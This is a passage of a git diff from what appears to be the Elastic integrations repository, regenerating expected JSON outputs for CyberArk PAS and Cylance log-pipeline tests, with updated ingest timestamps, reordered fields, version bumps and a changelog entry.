\u003cMessageID\u003e98\u003c/MessageID\u003e\\n \u003cDesc\u003eOpen File (Write Only)\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eOpen File (Write Only)\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePVWAConfig\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PVConfiguration.xml\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eOpen File (Write Only)\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:45:26\",\"IsoTimestamp\":\"2021-03-11T19:45:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\PVConfiguration.xml\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "98", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json index cd746dd1cb6..e43be8181f5 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-99-open-file.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "open file", - "ingested": "2021-12-09T13:37:15.063025200Z", + "ingested": "2021-12-14T14:42:45.155755773Z", "original": "\u003c5\u003e1 2021-03-04T19:10:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:05\",\"IsoTimestamp\":\"2021-03-04T19:10:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"99\",\"Desc\":\"Open File\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Open File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"Root\\\\EPMConfiguration.xml\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File\",\"GatewayStation\":\"\"}}}", "code": "99", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json index 18b20cc2947..e348d3e65e8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-legacysyslog.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -42,14 +35,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-12-09T13:37:15.166336200Z", + "ingested": "2021-12-14T14:42:45.275562343Z", "original": "Mar 08 03:41:01 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManagerShared\",\"File\":\"Root\\\\Policies\\\\Policy-BusinessWebsite.ini\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json index b23043495f1..59ed8851083 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-rfc5424syslog.log-expected.json @@ -49,7 +49,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:15.267387900Z", + "ingested": "2021-12-14T14:42:45.379284146Z", "original": "\u003c5\u003e1 2021-03-04T17:27:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:14\",\"IsoTimestamp\":\"2021-03-04T17:27:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -116,7 +116,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:15.267396800Z", + "ingested": "2021-12-14T14:42:45.379286410Z", "original": "\u003c5\u003e1 2021-03-04T17:27:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:21\",\"IsoTimestamp\":\"2021-03-04T17:27:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -186,7 +186,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-12-09T13:37:15.267402800Z", + "ingested": "2021-12-14T14:42:45.379286963Z", "original": "\u003c5\u003e1 2021-03-04T17:27:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:21\",\"IsoTimestamp\":\"2021-03-04T17:27:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManagerShared\",\"File\":\"Root\\\\Policies\\\\Policy-GenericWebApp.ini\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" @@ -241,7 +241,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:15.267408600Z", + "ingested": "2021-12-14T14:42:45.379287380Z", "original": "\u003c5\u003e1 2021-03-04T17:27:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:33\",\"IsoTimestamp\":\"2021-03-04T17:27:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", diff --git a/packages/cyberarkpas/manifest.yml b/packages/cyberarkpas/manifest.yml index 77ca5219bda..ba7660f6443 100644 --- a/packages/cyberarkpas/manifest.yml +++ b/packages/cyberarkpas/manifest.yml @@ -1,6 +1,6 @@ name: cyberarkpas title: CyberArk Privileged Access Security Logs -version: 2.2.1 +version: 2.2.2 release: ga description: Collect audit logs from Cyberark Vault servers with Elastic Agent. type: integration diff --git a/packages/cylance/changelog.yml b/packages/cylance/changelog.yml index 2d6c6cbce22..b9d7afb368a 100644 --- a/packages/cylance/changelog.yml +++ b/packages/cylance/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cylance/data_stream/protect/_dev/test/pipeline/test-generated.log-expected.json b/packages/cylance/data_stream/protect/_dev/test/pipeline/test-generated.log-expected.json index deb38a2fe6f..37e9d766e8e 100644 --- a/packages/cylance/data_stream/protect/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/cylance/data_stream/protect/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "29-January-2016 06:09:59 high boNemoe4402.www.invalid dolore \u003c\u003csequa\u003eabo 2016-1-29T6:09:59.squira nostrud4819.mail.test CylancePROTECT mqui nci [billoi] Event Type: AuditLog, Event Name: ZoneAdd, Message: Policy Assigned:orev; Devices: pisciv , User: uii umexe (estlabo)", "event": { - "ingested": "2021-06-09T10:27:47.525582200Z" + "ingested": "2021-12-14T14:42:47.135044984Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-2-12T1:12:33.olupt volup208.invalid CylancePROTECT eosquir orsi [nulapari] Event Type: AuditLog, Event Name: LoginSuccess, Message: Devices: vol, User: luptat isiutal (moenimi)", "event": { - "ingested": "2021-06-09T10:27:47.525605100Z" + "ingested": "2021-12-14T14:42:47.135048045Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "26-Feb-2016 8:15:08 very-high anonnu410.internal.home aqu \u003c\u003cutper\u003esquame 26T20:15:08.ntex eius6159.www5.localhost CylancePROTECT Event Name:Alert, Device Message: Device: aer User: ),lupt (tia oloremqu Zone Names: temvel Device Id: iatu", "event": { - "ingested": "2021-06-09T10:27:47.525612400Z" + "ingested": "2021-12-14T14:42:47.135048982Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-3-12T3:17:42.ceroinBC ratvolup497.www.corp CylancePROTECT ionofde con [uia] Event Type: AuditLog, Event Name: SystemSecurity, Message: ommodic, User: mipsu consec (taliquip)", "event": { - "ingested": "2021-06-09T10:27:47.525625400Z" + "ingested": "2021-12-14T14:42:47.135049431Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-3-26T10:20:16.gelit tatno5625.api.local CylancePROTECT taev roidents [oluptas] Event Type: AuditLog, Event Name: Alert, Message: Source: taliqu; SHA256: ommod; Reason: failure, User: tur aperi (iveli)", "event": { - "ingested": "2021-06-09T10:27:47.525631300Z" + "ingested": "2021-12-14T14:42:47.135049821Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uatDuis 2016-4-9T5:22:51.ude maveniam1399.mail.lan CylancePROTECT siutaliq exercit [tempor] Event Type: omnis, Event Name: SystemSecurity, Device Name: eip, Agent Version: lupta, IP Address: (10.124.61.119), MAC Address: (01:00:5e:dc:bb:8b), Logged On Users: (occ), OS: ect Zone Names: reetdolo", "event": { - "ingested": "2021-06-09T10:27:47.525636600Z" + "ingested": "2021-12-14T14:42:47.135050202Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "24-Apr-2016 12:25:25 low lor340.mail.local natura \u003c\u003caboris\u003eima 24T00:25:25.tanimi nimadmin6499.local CylancePROTECT Event Name:Device Policy Assigned, Device Message: Device: dexe User: ),urerep (aquaeab liqu Zone Names: lorem Device Id: emq", "event": { - "ingested": "2021-06-09T10:27:47.525642400Z" + "ingested": "2021-12-14T14:42:47.135050612Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ari 2016-5-8T7:27:59.equun suntinc4934.www5.test CylancePROTECT ipis gelits [tatevel] Event Type: AuditLog, Event Name: ThreatUpdated, Message: Policy: uptatev; SHA256: uovol, User: )dmi (olab mquisnos", "event": { - "ingested": "2021-06-09T10:27:47.525648Z" + "ingested": "2021-12-14T14:42:47.135050996Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "22-May-2016 14:30:33 medium tvol457.internal.local inim \u003c\u003cema\u003eroinBCSe 2016-5-22T2:30:33.onse tae1382.mail.localhost CylancePROTECT oluptate ofdeF tion Event Type: orsitame, Event Name: threat_quarantined, Threat Class: lit, Threat Subclass: iam, SHA256: qua, MD5: umdo", "event": { - "ingested": "2021-06-09T10:27:47.525653200Z" + "ingested": "2021-12-14T14:42:47.135051388Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-6-5T9:33:08.eniam reetdolo2451.www.example CylancePROTECT rumet oll [erc] Event Type: ScriptControl, Event Name: SystemSecurity, Device Name: llam, File Path: aspern, Interpreter: itlabori, Interpreter Version: 1.2344, Zone Names: ollit, User Name: usan", "event": { - "ingested": "2021-06-09T10:27:47.525658100Z" + "ingested": "2021-12-14T14:42:47.135051768Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olo 2016-6-20T4:35:42.uaera sitas4259.mail.corp CylancePROTECT atquovo iumto aboreetd Event Type: AuditLog, Event Name: ZoneAddDevice, Message: Zone: dun; Policy: enim; Value: saute, User: vel quu (undeo)", "event": { - "ingested": "2021-06-09T10:27:47.525663800Z" + "ingested": "2021-12-14T14:42:47.135052151Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-7-4T11:38:16.isqu uis7612.www5.domain CylancePROTECT llumquid tation [ips] Event Type: emeumfug, Event Name: Registration, emporinc", "event": { - "ingested": "2021-06-09T10:27:47.525668600Z" + "ingested": "2021-12-14T14:42:47.135052725Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cup 2016-7-18T6:40:50.boNemoen uid7309.api.domain CylancePROTECT uradi aborumSe luptat Event Type: AuditLog, Event Name: SyslogSettingsSave, Message: Policy: antiumto, User: strude ctetura (usmod)", "event": { - "ingested": "2021-06-09T10:27:47.525673400Z" + "ingested": "2021-12-14T14:42:47.135053133Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2-Aug-2016 1:43:25 high fugit7668.www5.invalid lupt \u003c\u003cxea\u003equa 2T01:43:25.luptatev admi3749.api.lan CylancePROTECT Event Name:DeviceRemove, Device Message: Device: tinvol; Zones Removed: dolore; Zones Added: abor, User: iqui etc (etM), Zone Names:nimadmin Device Id: ditautfu", "event": { - "ingested": "2021-06-09T10:27:47.525678200Z" + "ingested": "2021-12-14T14:42:47.135053539Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-8-16T8:45:59.ostr rudexerc703.internal.host CylancePROTECT itaut imaven [liqua] Event Type: ScriptControl, Event Name: fullaccess, Device Name: onproide, File Path: Nemoen, Interpreter: tfug, Interpreter Version: 1.5383 (ccu), Zone Names: urE, User Name: isaute", "event": { - "ingested": "2021-06-09T10:27:47.525682900Z" + "ingested": "2021-12-14T14:42:47.135053936Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eomnisis 2016-8-30T3:48:33.mqui civeli370.www5.local CylancePROTECT sunt stl tdolorem Event Type: AuditLog, Event Name: Alert, Message: The Device: picia was auto assigned to the Zone: IP Address: Fake Devices, User: mUtenima emaperi ()tame", "event": { - "ingested": "2021-06-09T10:27:47.525687400Z" + "ingested": "2021-12-14T14:42:47.135054323Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 2016/09/13 22:51:07 ivelits712.api.example CylancePROTECT Event Type: AppControl, etdolo inv [agnaali] Event Type: AppControl, Event Name: threat_found, Device Name: sequatur, IP Address: (10.199.98.186), Action: cancel, Action Type: nihi, File Path: Lor, SHA256: itecto, Zone Names: erc", "event": { - "ingested": "2021-06-09T10:27:47.525692Z" + "ingested": "2021-12-14T14:42:47.135054839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupt 2016-9-28T5:53:42.modoco estqu1709.internal.example CylancePROTECT ostrume molest [upt] Event Type: Threat, Event Name: LoginSuccess, Device Name: uasia, IP Address: (10.64.70.5), File Name: ici, Path: giatquov, Drive Type: eritquii, SHA256: dexeac, MD5: iscinge, Status: atvol, Cylance Score: 145.898000, Found Date: uames, File Type: tati, Is Running: utaliqu, Auto Run: oriosamn, Detected By: deFinibu, Zone Names: iadese, Is Malware: imidest, Is Unique To Cylance: emagnama, Threat Classification: eprehend", "event": { - "ingested": "2021-06-09T10:27:47.525696800Z" + "ingested": "2021-12-14T14:42:47.135055240Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016-10-12T12:56:16.suntinc xeac7155.www.localdomain CylancePROTECT taliq intoccae [ents] Event Type: pida, Event Name: Alert, Device Name: idolor, Agent Version: emeumfu, IP Address: (10.143.239.210), MAC Address: (01:00:5e:93:1c:9f), Logged On Users: (oinBCSe), OS: mnisist Zone Names: sedd", "event": { - "ingested": "2021-06-09T10:27:47.525701500Z" + "ingested": "2021-12-14T14:42:47.135055647Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ipitla 2016-10-26T7:58:50.quae maccusa5126.api.domain CylancePROTECT idex xerci [aqu] Event Type: ExploitAttempt, Event Name: Alert, Device Name: olorema, IP Address: (10.32.143.134), Action: accept, Process ID: 2289, Process Name: aliqu.exe, User Name: olupta, Violation Type: mipsumd, Zone Names: eFinib", "event": { - "ingested": "2021-06-09T10:27:47.525706600Z" + "ingested": "2021-12-14T14:42:47.135056039Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10-Nov-2016 3:01:24 low eav3687.internal.local siar \u003c\u003corev\u003eiamquis 10T03:01:24.quirat llu4718.localhost CylancePROTECT Event Name:DeviceEdit, Device Name:conseq, External Device Type:oidentsu, External Device Vendor ID:atiset, External Device Name:atu, External Device Product ID:umexerci, External Device Serial Number:ern, Zone Names:psaquae", "event": { - "ingested": "2021-06-09T10:27:47.525711600Z" + "ingested": "2021-12-14T14:42:47.135056430Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Nov 24 10:03:59 doloremi7402.www.test CylancePROTECT Event Type:stquidol, Event Name:DeviceRemove, Device Message: Device: leumiu; Policy Changed: namali to 'taevit', User: rinrepre etconse (tincu), Zone Names:ari, Device Id: exercit", "event": { - "ingested": "2021-06-09T10:27:47.525716700Z" + "ingested": "2021-12-14T14:42:47.135056823Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "8-December-2016 17:06:33 very-high occae1180.internal.localhost aquaeabi \u003c\u003clita\u003eadeseru 2016-12-8T5:06:33.emoe eaq908.api.home CylancePROTECT itame intoc [oluptas] Event Type: tNequepo, Event Name: ZoneAddDevice, Device Name: luptasn, Zone Names:equat", "event": { - "ingested": "2021-06-09T10:27:47.525721500Z" + "ingested": "2021-12-14T14:42:47.135057217Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ihilmole 2016-12-23T12:09:07.eriamea amre146.mail.host CylancePROTECT pisciv iquidex radipisc Event Type: AuditLog, Event Name: ZoneAddDevice, Message: Policy: nti; SHA256: abi; Category: sectetur, User: )uioffi (oru temqu", "event": { - "ingested": "2021-06-09T10:27:47.525728Z" + "ingested": "2021-12-14T14:42:47.135057746Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ommodico 2017-1-6T7:11:41.quatD mcolab379.internal.home CylancePROTECT tsedqu agnid [proide] Event Type: ScriptControl, Event Name: DeviceRemove, Device Name: tper, File Path: olor, Interpreter: Neque, Interpreter Version: 1.4129 (xerc), Zone Names: iutali, User Name: fdeFi", "event": { - "ingested": "2021-06-09T10:27:47.525745700Z" + "ingested": "2021-12-14T14:42:47.135058137Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 20 2:14:16 tasuntex5037.www.corp CylancePROTECT Event Type:boN, Event Name:threat_quarantined, Device Name:ectio, Agent Version:dutper, IP Address: (10.237.205.140), MAC Address: (01:00:5e:3f:c4:6c), Logged On Users: (uames), OS:iduntu, Zone Names:veniam", "event": { - "ingested": "2021-06-09T10:27:47.525752300Z" + "ingested": "2021-12-14T14:42:47.135058523Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "3-Feb-2017 9:16:50 very-high reme622.mail.example isnisiu \u003c\u003cbore\u003etsu 3T21:16:50.tcons sciun4694.api.lan CylancePROTECT Event Name:LoginSuccess, Device Message: Device: nsect User: ),idata (rumwritt magnid Zone Names: enderit Device Id: untex", "event": { - "ingested": "2021-06-09T10:27:47.525758200Z" + "ingested": "2021-12-14T14:42:47.135058902Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "paquioff 2017-2-18T4:19:24.mquisnos maven3758.www.invalid CylancePROTECT labor didunt uptatema Event Type: ExploitAttempt, Event Name: DeviceEdit, Device Name: udan, IP Address: (10.74.104.215), Action: cancel, Process ID: 7410, Process Name: mveleu.exe, User Name: nofdeFin, Violation Type: sequam, Zone Names: temvel", "event": { - "ingested": "2021-06-09T10:27:47.525764300Z" + "ingested": "2021-12-14T14:42:47.135059285Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "4-Mar-2017 11:21:59 medium tvolu3997.mail.home eiu \u003c\u003cntiumdo\u003eautfu 4T11:21:59.gnaaliq mni7200.mail.localdomain CylancePROTECT Event Name:pechange, Device Name:idolor, Zone Names:uisau, Device Id: eleum", "event": { - "ingested": "2021-06-09T10:27:47.525769700Z" + "ingested": "2021-12-14T14:42:47.135059676Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Mar 18 6:24:33 ate4627.localdomain CylancePROTECT Event Type:officiad, Event Name:Device Policy Assigned, Message: The Device:quinescwas auto assigned to Zone:madmi, User:tur", "event": { - "ingested": "2021-06-09T10:27:47.525774700Z" + "ingested": "2021-12-14T14:42:47.135060066Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2-April-2017 01:27:07 very-high orem6702.invalid tev \u003c\u003csaute\u003entocca 2017-4-2T1:27:07.ostru ntoccae1705.internal.invalid CylancePROTECT temquiav equatu [upta] Event Type: ScriptControl, Event Name: Alert, Device Name: sBon, File Path: orro, Interpreter: tae, Interpreter Version: 1.3212, Zone Names: tlab, User Name: aperiame", "event": { - "ingested": "2021-06-09T10:27:47.525779900Z" + "ingested": "2021-12-14T14:42:47.135060477Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "16-Apr-2017 8:29:41 high tobea2364.internal.localhost itinvol \u003c\u003ceavolup\u003efugiatn 16T08:29:41.docon etconsec6708.internal.invalid CylancePROTECT Event Name:PolicyAdd, Device Name:ersp, External Device Type:tquov, External Device Vendor ID:diconseq, External Device Name:inven, External Device Product ID:osquira, External Device Serial Number:tes, Zone Names:mquame", "event": { - "ingested": "2021-06-09T10:27:47.525784500Z" + "ingested": "2021-12-14T14:42:47.135060854Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-4-30T3:32:16.squirati Sedutp7428.internal.home CylancePROTECT utlabor itessequ [porro] Event Type: AuditLog, Event Name: PolicyAdd, Message: Zone: iquipe; Policy: itempor; Value: quin, User: upida tvolupt (eufugi)", "event": { - "ingested": "2021-06-09T10:27:47.525789400Z" + "ingested": "2021-12-14T14:42:47.135061239Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uamni 2017-5-14T10:34:50.ctet ati4639.www5.home CylancePROTECT archite loreme [untu] Event Type: AuditLog, Event Name: Alert, Message: Device: ven; User: con nisist (usmodte)", "event": { - "ingested": "2021-06-09T10:27:47.525796200Z" + "ingested": "2021-12-14T14:42:47.135061618Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-5-29T5:37:24.eturadi torever662.www5.home CylancePROTECT quam sumdolor [meaqueip] Event Type: AuditLog, Event Name: PolicyAdd, Message: The Device: pexe was auto assigned to the Zone: IP Address: 10.70.168.240, User: amcol adeser ()oin", "event": { - "ingested": "2021-06-09T10:27:47.525801300Z" + "ingested": "2021-12-14T14:42:47.135062127Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "12-June-2017 12:39:58 medium meius3932.internal.example ccaeca \u003c\u003cumdolo\u003euptate 2017-6-12T12:39:58.amc cusant1701.api.localdomain CylancePROTECT siutaliq dutp psaquaea Event Type: taevita, Event Name: DeviceRemove, Device Name: siut, Agent Version: tconsect, IP Address: (10.190.175.158), MAC Address: (01:00:5e:45:8b:97), Logged On Users: (ditemp), OS: edqui", "event": { - "ingested": "2021-06-09T10:27:47.525806100Z" + "ingested": "2021-12-14T14:42:47.135062563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, 